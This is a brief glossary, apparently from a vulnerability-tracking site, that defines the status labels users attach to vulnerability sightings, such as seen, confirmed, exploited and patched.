Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…